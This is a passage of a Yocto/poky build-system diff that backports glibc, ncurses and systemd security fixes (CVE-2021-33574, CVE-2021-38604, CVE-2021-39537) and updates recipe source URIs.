a/elf/dl-tls.c b/elf/dl-tls.c +index d554ae4497..9260d2d696 100644 +--- a/elf/dl-tls.c ++++ b/elf/dl-tls.c +@@ -443,7 +443,7 @@ + size_t maxgen = 0; + + /* Protects global dynamic TLS related state. */ +- __rtld_lock_lock_recursive (GL(dl_load_lock)); ++ __rtld_lock_lock_recursive (GL(dl_load_tls_lock)); + + /* Check if the current dtv is big enough. */ + if (dtv[-1].counter < GL(dl_tls_max_dtv_idx)) +@@ -517,7 +517,7 @@ + listp = listp->next; + assert (listp != NULL); + } +- __rtld_lock_unlock_recursive (GL(dl_load_lock)); ++ __rtld_lock_unlock_recursive (GL(dl_load_tls_lock)); + + /* The DTV version is up-to-date now. */ + dtv[0].counter = maxgen; +@@ -656,7 +656,7 @@ + + Here the dtv needs to be updated to new_gen generation count. + +- This code may be called during TLS access when GL(dl_load_lock) ++ This code may be called during TLS access when GL(dl_load_tls_lock) + is not held. In that case the user code has to synchronize with + dlopen and dlclose calls of relevant modules. A module m is + relevant if the generation of m <= new_gen and dlclose of m is +@@ -778,11 +778,11 @@ + if (__glibc_unlikely (the_map->l_tls_offset + != FORCED_DYNAMIC_TLS_OFFSET)) + { +- __rtld_lock_lock_recursive (GL(dl_load_lock)); ++ __rtld_lock_lock_recursive (GL(dl_load_tls_lock)); + if (__glibc_likely (the_map->l_tls_offset == NO_TLS_OFFSET)) + { + the_map->l_tls_offset = FORCED_DYNAMIC_TLS_OFFSET; +- __rtld_lock_unlock_recursive (GL(dl_load_lock)); ++ __rtld_lock_unlock_recursive (GL(dl_load_tls_lock)); + } + else if (__glibc_likely (the_map->l_tls_offset + != FORCED_DYNAMIC_TLS_OFFSET)) +@@ -794,7 +794,7 @@ + #else + # error "Either TLS_TCB_AT_TP or TLS_DTV_AT_TP must be defined" + #endif +- __rtld_lock_unlock_recursive (GL(dl_load_lock)); ++ __rtld_lock_unlock_recursive (GL(dl_load_tls_lock)); + + dtv[GET_ADDR_MODULE].pointer.to_free = NULL; + dtv[GET_ADDR_MODULE].pointer.val = p; +@@ -802,7 +802,7 @@ + return (char *) p + GET_ADDR_OFFSET; + } + else +- __rtld_lock_unlock_recursive (GL(dl_load_lock)); ++ __rtld_lock_unlock_recursive (GL(dl_load_tls_lock)); + } + struct dtv_pointer result = allocate_and_init (the_map); + dtv[GET_ADDR_MODULE].pointer = result; +@@ -873,7 +873,7 @@ + return NULL; + + dtv_t *dtv = THREAD_DTV (); +- /* This may be called without holding the GL(dl_load_lock). Reading ++ /* This may be called without holding the GL(dl_load_tls_lock). Reading + arbitrary gen value is fine since this is best effort code. */ + size_t gen = atomic_load_relaxed (&GL(dl_tls_generation)); + if (__glibc_unlikely (dtv[0].counter != gen)) +diff --git a/elf/rtld.c b/elf/rtld.c +index 8d2bba3d43..9642eb9c92 100644 +--- a/elf/rtld.c ++++ b/elf/rtld.c +@@ -283,6 +283,7 @@ + #ifdef _LIBC_REENTRANT + ._dl_load_lock = _RTLD_LOCK_RECURSIVE_INITIALIZER, + ._dl_load_write_lock = _RTLD_LOCK_RECURSIVE_INITIALIZER, ++ ._dl_load_tls_lock = _RTLD_LOCK_RECURSIVE_INITIALIZER, + #endif + ._dl_nns = 1, + ._dl_ns = +diff --git a/sysdeps/nptl/fork.c b/sysdeps/nptl/fork.c +index c471f7b15f..021691b9b7 100644 +--- a/sysdeps/nptl/fork.c ++++ b/sysdeps/nptl/fork.c +@@ -125,6 +125,9 @@ + /* Reset the lock the dynamic loader uses to protect its data. */ + __rtld_lock_initialize (GL(dl_load_lock)); + ++ /* Reset the lock protecting dynamic TLS related data. */ ++ __rtld_lock_initialize (GL(dl_load_tls_lock)); ++ + /* Run the handlers registered for the child. */ + __run_fork_handlers (atfork_run_child, multiple_threads); + } +diff --git a/sysdeps/generic/ldsodefs.h b/sysdeps/generic/ldsodefs.h +index d49529da0d..9ec1511bb0 100644 +--- a/sysdeps/generic/ldsodefs.h ++++ b/sysdeps/generic/ldsodefs.h +@@ -369,6 +369,13 @@ + list of loaded objects while an object is added to or removed + from that list. */ + __rtld_lock_define_recursive (EXTERN, _dl_load_write_lock) ++ /* This lock protects global and module specific TLS related data. ++ E.g. it is held in dlopen and dlclose when GL(dl_tls_generation), ++ GL(dl_tls_max_dtv_idx) or GL(dl_tls_dtv_slotinfo_list) are ++ accessed and when TLS related relocations are processed for a ++ module. It was introduced to keep pthread_create accessing TLS ++ state that is being set up. */ ++ __rtld_lock_define_recursive (EXTERN, _dl_load_tls_lock) + + /* Incremented whenever something may have been added to dl_loaded. */ + EXTERN unsigned long long _dl_load_adds; +@@ -1153,7 +1160,7 @@ + + /* Add module to slot information data. If DO_ADD is false, only the + required memory is allocated. Must be called with GL +- (dl_load_lock) acquired. If the function has already been called ++ (dl_load_tls_lock) acquired. If the function has already been called + for the link map L with !do_add, then this function will not raise + an exception, otherwise it is possible that it encounters a memory + allocation failure. */ +-- +2.27.0 diff --git a/poky/meta/recipes-core/glibc/glibc/CVE-2021-33574_1.patch b/poky/meta/recipes-core/glibc/glibc/CVE-2021-33574_1.patch new file mode 100644 index 0000000000..cef0ce54ed --- /dev/null +++ b/poky/meta/recipes-core/glibc/glibc/CVE-2021-33574_1.patch @@ -0,0 +1,72 @@ +From 42d359350510506b87101cf77202fefcbfc790cb Mon Sep 17 00:00:00 2001 +From: Andreas Schwab <schwab@linux-m68k.org> +Date: Thu, 27 May 2021 12:49:47 +0200 +Subject: [PATCH] Use __pthread_attr_copy in mq_notify (bug 27896) + +Make a deep copy of the pthread attribute object to remove a potential +use-after-free issue. + +Upstream-Status: Backport +CVE: CVE-2021-33574 patch#1 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + NEWS | 4 ++++ + sysdeps/unix/sysv/linux/mq_notify.c | 15 ++++++++++----- + 2 files changed, 14 insertions(+), 5 deletions(-) + +Index: git/NEWS +=================================================================== +--- git.orig/NEWS ++++ git/NEWS +@@ -7,6 +7,10 @@ using `glibc' in the "product" field. + + Version 2.31.1 + ++ CVE-2021-33574: The mq_notify function has a potential use-after-free ++ issue when using a notification type of SIGEV_THREAD and a thread ++ attribute with a non-default affinity mask. ++ + The following bugs are resolved with this release: + [19519] iconv(1) with -c option hangs on illegal multi-byte sequences + (CVE-2016-10228) +Index: git/sysdeps/unix/sysv/linux/mq_notify.c +=================================================================== +--- git.orig/sysdeps/unix/sysv/linux/mq_notify.c ++++ git/sysdeps/unix/sysv/linux/mq_notify.c +@@ -135,8 +135,11 @@ helper_thread (void *arg) + (void) __pthread_barrier_wait (¬ify_barrier); + } + else if (data.raw[NOTIFY_COOKIE_LEN - 1] == NOTIFY_REMOVED) +- /* The only state we keep is the copy of the thread attributes. */ +- free (data.attr); ++ { ++ /* The only state we keep is the copy of the thread attributes. */ ++ pthread_attr_destroy (data.attr); ++ free (data.attr); ++ } + } + return NULL; + } +@@ -257,8 +260,7 @@ mq_notify (mqd_t mqdes, const struct sig + if (data.attr == NULL) + return -1; + +- memcpy (data.attr, notification->sigev_notify_attributes, +- sizeof (pthread_attr_t)); ++ __pthread_attr_copy (data.attr, notification->sigev_notify_attributes); + } + + /* Construct the new request. */ +@@ -272,7 +274,10 @@ mq_notify (mqd_t mqdes, const struct sig + + /* If it failed, free the allocated memory. */ + if (__glibc_unlikely (retval != 0)) +- free (data.attr); ++ { ++ pthread_attr_destroy (data.attr); ++ free (data.attr); ++ } + + return retval; + } diff --git a/poky/meta/recipes-core/glibc/glibc/CVE-2021-33574_2.patch b/poky/meta/recipes-core/glibc/glibc/CVE-2021-33574_2.patch new file mode 100644 index 0000000000..396cd7fc0e --- /dev/null +++ b/poky/meta/recipes-core/glibc/glibc/CVE-2021-33574_2.patch @@ -0,0 +1,73 @@ +From 217b6dc298156bdb0d6aea9ea93e7e394a5ff091 Mon Sep 17 00:00:00 2001 +From: Florian Weimer <fweimer@redhat.com> +Date: Tue, 1 Jun 2021 17:51:41 +0200 +Subject: [PATCH] Fix use of __pthread_attr_copy in mq_notify (bug 27896) + +__pthread_attr_copy can fail and does not initialize the attribute +structure in that case. + +If __pthread_attr_copy is never called and there is no allocated +attribute, pthread_attr_destroy should not be called, otherwise +there is a null pointer dereference in rt/tst-mqueue6. + +Fixes commit 42d359350510506b87101cf77202fefcbfc790cb +("Use __pthread_attr_copy in mq_notify (bug 27896)"). + +Reviewed-by: Siddhesh Poyarekar <siddhesh@sourceware.org> + +https://sourceware.org/bugzilla/attachment.cgi?id=13497 + +Upstream-Status: Backport +CVE: CVE-2021-33574 patch#2 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- +Index: git/sysdeps/unix/sysv/linux/mq_notify.c +=================================================================== +--- git.orig/sysdeps/unix/sysv/linux/mq_notify.c ++++ git/sysdeps/unix/sysv/linux/mq_notify.c +@@ -260,7 +260,34 @@ mq_notify (mqd_t mqdes, const struct sig + if (data.attr == NULL) + return -1; + +- __pthread_attr_copy (data.attr, notification->sigev_notify_attributes); ++ memcpy (data.attr, notification->sigev_notify_attributes, ++ sizeof (pthread_attr_t)); ++ ++ struct pthread_attr *source = ++ (struct pthread_attr *) (notification->sigev_notify_attributes); ++ struct pthread_attr *target = (struct pthread_attr *) (data.attr); ++ cpu_set_t *newp; ++ cpu_set_t *cpuset = source->cpuset; ++ size_t cpusetsize = source->cpusetsize; ++ ++ /* alloc a new memory for cpuset to avoid use after free */ ++ if (cpuset != NULL && cpusetsize > 0) ++ { ++ newp = (cpu_set_t *) malloc (cpusetsize); ++ if (newp == NULL) ++ { ++ free(data.attr); ++ return -1; ++ } ++ ++ memcpy (newp, cpuset, cpusetsize); ++ target->cpuset = newp; ++ } ++ else ++ { ++ target->cpuset = NULL; ++ target->cpusetsize = 0; ++ } + } + + /* Construct the new request. */ +@@ -273,7 +300,7 @@ mq_notify (mqd_t mqdes, const struct sig + int retval = INLINE_SYSCALL (mq_notify, 2, mqdes, &se); + + /* If it failed, free the allocated memory. */ +- if (__glibc_unlikely (retval != 0)) ++ if (retval != 0 && data.attr != NULL) + { + pthread_attr_destroy (data.attr); + free (data.attr); diff --git a/poky/meta/recipes-core/glibc/glibc/CVE-2021-38604.patch b/poky/meta/recipes-core/glibc/glibc/CVE-2021-38604.patch new file mode 100644 index 0000000000..36fd4a61b2 --- /dev/null +++ b/poky/meta/recipes-core/glibc/glibc/CVE-2021-38604.patch @@ -0,0 +1,41 @@ +From b805aebd42364fe696e417808a700fdb9800c9e8 Mon Sep 17 00:00:00 2001 +From: Nikita Popov <npv1310@gmail.com> +Date: Mon, 9 Aug 2021 20:17:34 +0530 +Subject: [PATCH] librt: fix NULL pointer dereference (bug 28213) + +Helper thread frees copied attribute on NOTIFY_REMOVED message +received from the OS kernel. Unfortunately, it fails to check whether +copied attribute actually exists (data.attr != NULL). This worked +earlier because free() checks passed pointer before actually +attempting to release corresponding memory. But +__pthread_attr_destroy assumes pointer is not NULL. + +So passing NULL pointer to __pthread_attr_destroy will result in +segmentation fault. This scenario is possible if +notification->sigev_notify_attributes == NULL (which means default +thread attributes should be used). + +Signed-off-by: Nikita Popov <npv1310@gmail.com> +Reviewed-by: Siddhesh Poyarekar <siddhesh@sourceware.org> + +Upstream-Status: Backport +CVE: CVE-2021-38604 +Signed-off-by: Armin Kuser <akuster@mvista.com> + +--- + sysdeps/unix/sysv/linux/mq_notify.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +Index: git/sysdeps/unix/sysv/linux/mq_notify.c +=================================================================== +--- git.orig/sysdeps/unix/sysv/linux/mq_notify.c ++++ git/sysdeps/unix/sysv/linux/mq_notify.c +@@ -134,7 +134,7 @@ helper_thread (void *arg) + to wait until it is done with it. */ + (void) __pthread_barrier_wait (¬ify_barrier); + } +- else if (data.raw[NOTIFY_COOKIE_LEN - 1] == NOTIFY_REMOVED) ++ else if (data.raw[NOTIFY_COOKIE_LEN - 1] == NOTIFY_REMOVED && data.attr != NULL) + { + /* The only state we keep is the copy of the thread attributes. */ + pthread_attr_destroy (data.attr); diff --git a/poky/meta/recipes-core/glibc/glibc_2.31.bb b/poky/meta/recipes-core/glibc/glibc_2.31.bb index 8742efc36f..4a545cb97d 100644 --- a/poky/meta/recipes-core/glibc/glibc_2.31.bb +++ b/poky/meta/recipes-core/glibc/glibc_2.31.bb @@ -67,6 +67,17 @@ SRC_URI = "${GLIBC_GIT_URI};branch=${SRCBRANCH};name=glibc \ file://0028-inject-file-assembly-directives.patch \ file://0029-locale-prevent-maybe-uninitialized-errors-with-Os-BZ.patch \ file://CVE-2020-29573.patch \ + file://CVE-2021-33574_1.patch \ + file://CVE-2021-33574_2.patch \ + file://CVE-2021-38604.patch \ + file://0030-elf-Refactor_dl_update-slotinfo-to-avoid-use-after-free.patch \ + file://0031-elf-Fix-data-races-in-pthread_create-and-TLS-access-BZ-19329.patch \ + file://0032-elf-Use-relaxed-atomics-for-racy-accesses-BZ-19329.patch \ + file://0033-elf-Add-test-case-for-BZ-19329.patch \ + file://0034-elf-Fix-DTV-gap-reuse-logic-BZ-27135.patch \ + file://0035-x86_64-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch \ + file://0036-i386-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch \ + file://0037-Avoid-deadlock-between-pthread_create-and-ctors.patch \ " S = "${WORKDIR}/git" B = "${WORKDIR}/build-${TARGET_SYS}" diff --git a/poky/meta/recipes-core/glibc/ldconfig-native-2.12.1/ldconfig.patch b/poky/meta/recipes-core/glibc/ldconfig-native-2.12.1/ldconfig.patch index 52986e61c7..d1835c7a10 100644 --- a/poky/meta/recipes-core/glibc/ldconfig-native-2.12.1/ldconfig.patch +++ b/poky/meta/recipes-core/glibc/ldconfig-native-2.12.1/ldconfig.patch @@ -400,7 +400,7 @@ Index: ldconfig-native-2.12.1/ldconfig.c return 0; } -+#define REPORT_BUGS_TO "mailing list : poky@yoctoproject.org" ++#define REPORT_BUGS_TO "mailing list : poky@lists.yoctoproject.org" /* Print bug-reporting information in the help message. */ static char * more_help (int key, const char *text, void *input) diff --git a/poky/meta/recipes-core/ifupdown/ifupdown_0.8.35.bb b/poky/meta/recipes-core/ifupdown/ifupdown_0.8.35.bb index 16807eb675..c3681defdc 100644 --- a/poky/meta/recipes-core/ifupdown/ifupdown_0.8.35.bb +++ b/poky/meta/recipes-core/ifupdown/ifupdown_0.8.35.bb @@ -7,7 +7,7 @@ the file /etc/network/interfaces." LICENSE = "GPLv2" LIC_FILES_CHKSUM = "file://COPYING;md5=94d55d512a9ba36caa9b7df079bae19f" -SRC_URI = "git://salsa.debian.org/debian/ifupdown.git;protocol=https \ +SRC_URI = "git://salsa.debian.org/debian/ifupdown.git;protocol=https;branch=master \ file://defn2-c-man-don-t-rely-on-dpkg-architecture-to-set-a.patch \ file://99_network \ file://0001-Define-FNM_EXTMATCH-for-musl.patch \ diff --git a/poky/meta/recipes-core/images/build-appliance-image_15.0.0.bb b/poky/meta/recipes-core/images/build-appliance-image_15.0.0.bb index 96c47bd2af..e75b82cf1e 100644 --- a/poky/meta/recipes-core/images/build-appliance-image_15.0.0.bb +++ b/poky/meta/recipes-core/images/build-appliance-image_15.0.0.bb @@ -24,7 +24,7 @@ IMAGE_FSTYPES = "wic.vmdk" inherit core-image setuptools3 -SRCREV ?= "f22c2d6670d3b6f0d6eaa201fb2f9307a8d503d5" +SRCREV ?= "d752cbcbbeeea9adbcc9aa74def1761f34a9de54" SRC_URI = "git://git.yoctoproject.org/poky;branch=dunfell \ file://Yocto_Build_Appliance.vmx \ file://Yocto_Build_Appliance.vmxf \ diff --git a/poky/meta/recipes-core/libxcrypt/libxcrypt.inc b/poky/meta/recipes-core/libxcrypt/libxcrypt.inc index 2d2a0b03e3..b6bf48ba79 100644 --- a/poky/meta/recipes-core/libxcrypt/libxcrypt.inc +++ b/poky/meta/recipes-core/libxcrypt/libxcrypt.inc @@ -9,7 +9,7 @@ LIC_FILES_CHKSUM ?= "file://LICENSING;md5=3bb6614cf5880cbf1b9dbd9e3d145e2c \ inherit autotools pkgconfig -SRC_URI = "git://github.com/besser82/libxcrypt.git;branch=${SRCBRANCH}" +SRC_URI = "git://github.com/besser82/libxcrypt.git;branch=${SRCBRANCH};protocol=https" SRCREV = "823437d015cd4ab4d100ed205f218681b03ae45c" SRCBRANCH ?= "develop" diff --git a/poky/meta/recipes-core/libxml/libxml2_2.9.10.bb b/poky/meta/recipes-core/libxml/libxml2_2.9.10.bb index 60dc71f38d..ebb996c8dd 100644 --- a/poky/meta/recipes-core/libxml/libxml2_2.9.10.bb +++ b/poky/meta/recipes-core/libxml/libxml2_2.9.10.bb @@ -44,7 +44,7 @@ PACKAGECONFIG[ipv6] = "--enable-ipv6,--disable-ipv6," inherit autotools pkgconfig binconfig-disabled ptest features_check -inherit ${@bb.utils.contains('PACKAGECONFIG', 'python', 'python3native', '', d)} +inherit ${@bb.utils.contains('PACKAGECONFIG', 'python', 'python3targetconfig', '', d)} RDEPENDS_${PN}-ptest += "bash make ${@bb.utils.contains('PACKAGECONFIG', 'python', 'libgcc python3-core python3-logging python3-shell python3-stringold python3-threading python3-unittest ${PN}-python', '', d)}" diff --git a/poky/meta/recipes-core/meta/cve-update-db-native.bb b/poky/meta/recipes-core/meta/cve-update-db-native.bb index e86c69803f..50052f8532 100644 --- a/poky/meta/recipes-core/meta/cve-update-db-native.bb +++ b/poky/meta/recipes-core/meta/cve-update-db-native.bb @@ -17,7 +17,7 @@ python () { raise bb.parse.SkipRecipe("Skip recipe when cve-check class is not loaded.") } -python do_populate_cve_db() { +python do_fetch() { """ Update NVD database with json data feed """ @@ -110,7 +110,9 @@ python do_populate_cve_db() { conn.close() } -do_populate_cve_db[lockfiles] += "${CVE_CHECK_DB_FILE_LOCK}" +do_fetch[lockfiles] += "${CVE_CHECK_DB_FILE_LOCK}" +do_fetch[file-checksums] = "" +do_fetch[vardeps] = "" def initialize_db(c): c.execute("CREATE TABLE IF NOT EXISTS META (YEAR INTEGER UNIQUE, DATE TEXT)") @@ -217,7 +219,6 @@ def update_db(c, jsondata): parse_node_and_insert(c, config, cveId) -addtask do_populate_cve_db before do_fetch -do_populate_cve_db[nostamp] = "1" +do_fetch[nostamp] = "1" EXCLUDE_FROM_WORLD = "1" diff --git a/poky/meta/recipes-core/musl/libucontext_git.bb b/poky/meta/recipes-core/musl/libucontext_git.bb index ec988f1920..71beb80083 100644 --- a/poky/meta/recipes-core/musl/libucontext_git.bb +++ b/poky/meta/recipes-core/musl/libucontext_git.bb @@ -10,7 +10,7 @@ DEPENDS = "" PV = "0.10+${SRCPV}" SRCREV = "19fa1bbfc26efb92147b5e85cc0ca02a0e837561" -SRC_URI = "git://github.com/kaniini/libucontext \ +SRC_URI = "git://github.com/kaniini/libucontext;branch=master;protocol=https \ " S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-core/musl/musl-obstack.bb b/poky/meta/recipes-core/musl/musl-obstack.bb index 3003935fe5..74de48c2cd 100644 --- a/poky/meta/recipes-core/musl/musl-obstack.bb +++ b/poky/meta/recipes-core/musl/musl-obstack.bb @@ -10,7 +10,7 @@ SECTION = "libs" PV = "1.1" SRCREV = "d2ad66b0df44a4b784956f7f7f2717131ddc05f4" -SRC_URI = "git://github.com/pullmoll/musl-obstack" +SRC_URI = "git://github.com/pullmoll/musl-obstack;branch=master;protocol=https" UPSTREAM_CHECK_COMMITS = "1" diff --git a/poky/meta/recipes-core/musl/musl-utils.bb b/poky/meta/recipes-core/musl/musl-utils.bb index dd0ce33061..c30509469c 100644 --- a/poky/meta/recipes-core/musl/musl-utils.bb +++ b/poky/meta/recipes-core/musl/musl-utils.bb @@ -11,7 +11,7 @@ SECTION = "utils" PV = "20170421" SRCREV = "fb5630138ccabbbc14a19d372096a04e42573c7d" -SRC_URI = "git://github.com/boltlinux/musl-utils" +SRC_URI = "git://github.com/boltlinux/musl-utils;branch=master;protocol=https" UPSTREAM_CHECK_COMMITS = "1" diff --git a/poky/meta/recipes-core/musl/musl_git.bb b/poky/meta/recipes-core/musl/musl_git.bb index 82379fd1c5..cbb56f4769 100644 --- a/poky/meta/recipes-core/musl/musl_git.bb +++ b/poky/meta/recipes-core/musl/musl_git.bb @@ -12,7 +12,7 @@ PV = "${BASEVER}+git${SRCPV}" # mirror is at git://github.com/kraj/musl.git -SRC_URI = "git://git.musl-libc.org/musl \ +SRC_URI = "git://git.musl-libc.org/musl;branch=master \ file://0001-Make-dynamic-linker-a-relative-symlink-to-libc.patch \ file://0002-ldso-Use-syslibdir-and-libdir-as-default-pathes-to-l.patch \ " diff --git a/poky/meta/recipes-core/ncurses/files/CVE-2021-39537.patch b/poky/meta/recipes-core/ncurses/files/CVE-2021-39537.patch new file mode 100644 index 0000000000..7655200350 --- /dev/null +++ b/poky/meta/recipes-core/ncurses/files/CVE-2021-39537.patch @@ -0,0 +1,30 @@ +$NetBSD: patch-ncurses_tinfo_captoinfo.c,v 1.1 2021/10/09 07:52:36 wiz Exp $ + +Fix for CVE-2021-39537 from upstream: +https://github.com/ThomasDickey/ncurses-snapshots/commit/63ca9e061f4644795d6f3f559557f3e1ed8c738b#diff-7e95c7bc5f213e9be438e69a9d5d0f261a14952bcbd692f7b9014217b8047340 + +CVE: CVE-2021-39537 +Upstream-Status: Backport [http://cvsweb.netbsd.org/bsdweb.cgi/pkgsrc/devel/ncurses/patches/Attic/patch-ncurses_tinfo_captoinfo.c?rev=1.1&content-type=text/x-cvsweb-markup] +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- a/ncurses/tinfo/captoinfo.c 2020-02-02 23:34:34.000000000 +0000 ++++ b/ncurses/tinfo/captoinfo.c +@@ -216,12 +216,15 @@ cvtchar(register const char *sp) + } + break; + case '^': ++ len = 2; + c = UChar(*++sp); +- if (c == '?') ++ if (c == '?') { + c = 127; +- else ++ } else if (c == '\0') { ++ len = 1; ++ } else { + c &= 0x1f; +- len = 2; ++ } + break; + default: + c = UChar(*sp); diff --git a/poky/meta/recipes-core/ncurses/ncurses.inc b/poky/meta/recipes-core/ncurses/ncurses.inc index 7f1834f0dc..ee0b15ecf0 100644 --- a/poky/meta/recipes-core/ncurses/ncurses.inc +++ b/poky/meta/recipes-core/ncurses/ncurses.inc @@ -13,7 +13,7 @@ BINCONFIG = "${bindir}/ncurses5-config ${bindir}/ncursesw5-config \ inherit autotools binconfig-disabled multilib_header pkgconfig # Upstream has useful patches at times at ftp://invisible-island.net/ncurses/ -SRC_URI = "git://salsa.debian.org/debian/ncurses.git;protocol=https" +SRC_URI = "git://salsa.debian.org/debian/ncurses.git;protocol=https;branch=master" EXTRA_AUTORECONF = "-I m4" diff --git a/poky/meta/recipes-core/ncurses/ncurses_6.2.bb b/poky/meta/recipes-core/ncurses/ncurses_6.2.bb index 76f0cf97f4..700464f70b 100644 --- a/poky/meta/recipes-core/ncurses/ncurses_6.2.bb +++ b/poky/meta/recipes-core/ncurses/ncurses_6.2.bb @@ -3,6 +3,7 @@ require ncurses.inc SRC_URI += "file://0001-tic-hang.patch \ file://0002-configure-reproducible.patch \ file://0003-gen-pkgconfig.in-Do-not-include-LDFLAGS-in-generated.patch \ + file://CVE-2021-39537.patch \ " # commit id corresponds to the revision in package version SRCREV = "a669013cd5e9d6434e5301348ea51baf306c93c4" diff --git a/poky/meta/recipes-core/os-release/os-release.bb b/poky/meta/recipes-core/os-release/os-release.bb index a29d678125..33f75e39b8 100644 --- a/poky/meta/recipes-core/os-release/os-release.bb +++ b/poky/meta/recipes-core/os-release/os-release.bb @@ -12,7 +12,9 @@ do_configure[noexec] = "1" # Other valid fields: BUILD_ID ID_LIKE ANSI_COLOR CPE_NAME # HOME_URL SUPPORT_URL BUG_REPORT_URL -OS_RELEASE_FIELDS = "ID ID_LIKE NAME VERSION VERSION_ID PRETTY_NAME" +OS_RELEASE_FIELDS = "\ + ID ID_LIKE NAME VERSION VERSION_ID PRETTY_NAME DISTRO_CODENAME \ +" OS_RELEASE_UNQUOTED_FIELDS = "ID VERSION_ID VARIANT_ID" ID = "${DISTRO}" diff --git a/poky/meta/recipes-core/psplash/psplash_git.bb b/poky/meta/recipes-core/psplash/psplash_git.bb index 22c71f099b..b2947c2114 100644 --- a/poky/meta/recipes-core/psplash/psplash_git.bb +++ b/poky/meta/recipes-core/psplash/psplash_git.bb @@ -10,7 +10,7 @@ SRCREV = "0a902f7cd875ccf018456451be369f05fa55f962" PV = "0.1+git${SRCPV}" PR = "r15" -SRC_URI = "git://git.yoctoproject.org/${BPN} \ +SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master \ file://psplash-init \ file://psplash-start.service \ file://psplash-systemd.service \ diff --git a/poky/meta/recipes-core/systemd/systemd.inc b/poky/meta/recipes-core/systemd/systemd.inc index 3165d13f03..8b5260bb0d 100644 --- a/poky/meta/recipes-core/systemd/systemd.inc +++ b/poky/meta/recipes-core/systemd/systemd.inc @@ -16,6 +16,6 @@ LIC_FILES_CHKSUM = "file://LICENSE.GPL2;md5=751419260aa954499f7abaabaa882bbe \ SRCREV = "3ceaa81c61b654ebf562464d142675bd4d57d7b6" SRCBRANCH = "v244-stable" -SRC_URI = "git://github.com/systemd/systemd-stable.git;protocol=git;branch=${SRCBRANCH}" +SRC_URI = "git://github.com/systemd/systemd-stable.git;protocol=https;branch=${SRCBRANCH}" S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-core/systemd/systemd/basic-pass-allocation-info-for-ordered-set-new-and-introd.patch b/poky/meta/recipes-core/systemd/systemd/basic-pass-allocation-info-for-ordered-set-new-and-introd.patch new file mode 100644 index 0000000000..86d9b0499a --- /dev/null +++ b/poky/meta/recipes-core/systemd/systemd/basic-pass-allocation-info-for-ordered-set-new-and-introd.patch @@ -0,0 +1,78 @@ +From 1f25c71d9d0b5fe6cf383c347dcebc2443a99fe1 Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?Zbigniew=20J=C4=99drzejewski-Szmek?= <zbyszek@in.waw.pl> +Date: Tue, 1 Sep 2020 12:42:35 +0200 +Subject: [PATCH] basic: pass allocation info for ordered_set_new() and + introduce ordered_set_ensure_put() + +Upstream-Status: Backport [https://github.com/systemd/systemd-stable/commit/1f25c71d9d0b5fe6cf383c347dcebc2443a99fe1] +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + src/basic/ordered-set.c | 21 +++++++++++++++++++++ + src/basic/ordered-set.h | 18 +++++++----------- + 2 files changed, 28 insertions(+), 11 deletions(-) + +diff --git a/src/basic/ordered-set.c b/src/basic/ordered-set.c +index 7fdb47e064..fb82c17b5a 100644 +--- a/src/basic/ordered-set.c ++++ b/src/basic/ordered-set.c +@@ -4,6 +4,27 @@ + #include "ordered-set.h" + #include "strv.h" + ++int _ordered_set_ensure_allocated(OrderedSet **s, const struct hash_ops *ops HASHMAP_DEBUG_PARAMS) { ++ if (*s) ++ return 0; ++ ++ *s = _ordered_set_new(ops HASHMAP_DEBUG_PASS_ARGS); ++ if (!*s) ++ return -ENOMEM; ++ ++ return 0; ++} ++ ++int _ordered_set_ensure_put(OrderedSet **s, const struct hash_ops *ops, void *p HASHMAP_DEBUG_PARAMS) { ++ int r; ++ ++ r = _ordered_set_ensure_allocated(s, ops HASHMAP_DEBUG_PASS_ARGS); ++ if (r < 0) ++ return r; ++ ++ return ordered_set_put(*s, p); ++} ++ + int ordered_set_consume(OrderedSet *s, void *p) { + int r; + +diff --git a/src/basic/ordered-set.h b/src/basic/ordered-set.h +index a42a57eb49..2c241a808b 100644 +--- a/src/basic/ordered-set.h ++++ b/src/basic/ordered-set.h +@@ -7,20 +7,16 @@ + + typedef struct OrderedSet OrderedSet; + +-static inline OrderedSet* ordered_set_new(const struct hash_ops *ops) { +- return (OrderedSet*) ordered_hashmap_new(ops); ++static inline OrderedSet* _ordered_set_new(const struct hash_ops *ops HASHMAP_DEBUG_PARAMS) { ++ return (OrderedSet*) internal_ordered_hashmap_new(ops HASHMAP_DEBUG_PASS_ARGS); + } ++#define ordered_set_new(ops) _ordered_set_new(ops HASHMAP_DEBUG_SRC_ARGS) + +-static inline int ordered_set_ensure_allocated(OrderedSet **s, const struct hash_ops *ops) { +- if (*s) +- return 0; ++int _ordered_set_ensure_allocated(OrderedSet **s, const struct hash_ops *ops HASHMAP_DEBUG_PARAMS); ++#define ordered_set_ensure_allocated(s, ops) _ordered_set_ensure_allocated(s, ops HASHMAP_DEBUG_SRC_ARGS) + +- *s = ordered_set_new(ops); +- if (!*s) +- return -ENOMEM; +- +- return 0; +-} ++int _ordered_set_ensure_put(OrderedSet **s, const struct hash_ops *ops, void *p HASHMAP_DEBUG_PARAMS); ++#define ordered_set_ensure_put(s, hash_ops, key) _ordered_set_ensure_put(s, hash_ops, key HASHMAP_DEBUG_SRC_ARGS) + + static inline OrderedSet* ordered_set_free(OrderedSet *s) { + return (OrderedSet*) ordered_hashmap_free((OrderedHashmap*) s); diff --git a/poky/meta/recipes-core/systemd/systemd/introduce-ordered_set_clear-free-with-destructor.patch b/poky/meta/recipes-core/systemd/systemd/introduce-ordered_set_clear-free-with-destructor.patch new file mode 100644 index 0000000000..42b6e05b55 --- /dev/null +++ b/poky/meta/recipes-core/systemd/systemd/introduce-ordered_set_clear-free-with-destructor.patch @@ -0,0 +1,35 @@ +From d38a6476aad3f2cc80a2a4bc11f3898cc06a70f5 Mon Sep 17 00:00:00 2001 +From: Yu Watanabe <watanabe.yu+github@gmail.com> +Date: Mon, 26 Apr 2021 23:52:40 +0900 +Subject: [PATCH] ordered-set: introduce + ordered_set_clear/free_with_destructor() + +Upstream-Status: Backport [https://github.com/systemd/systemd-stable/commit/d38a6476aad3f2cc80a2a4bc11f3898cc06a70f5] +Signed-off-by: Ranjitsinh Rathod 